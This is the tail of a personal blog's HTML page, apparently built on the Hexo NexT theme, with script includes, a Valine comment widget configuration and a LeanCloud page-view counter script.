  <span class="author" itemprop="copyrightHolder">xianyu123</span>

  
</div>











        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: '9NfSKiv9nK43bHqe0PASB6LJ-gzGzoHsz',
        appKey: 'jL5QGkWKt6bpnKpTNwkA5c9n',
        placeholder: '有想说的欢迎留言，留下你的邮箱，有回复就会提醒你~（邮箱不会被公开）',
        avatar:'',
        guest_info:guest,
        pageSize:'10' || 10,
		avatar_cdn:'https://www.gravatar.com/avatar/',
    });
  </script>



  




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=5.1.4"></script>



  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("9NfSKiv9nK43bHqe0PASB6LJ-gzGzoHsz", "jL5QGkWKt6bpnKpTNwkA5c9n");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

  <script type="text/javascript" src="/lib/zclip/clipboard.min.js"></script>	
<script type="text/javascript" src="/js/src/custom.js"></script>

</body>
</html>
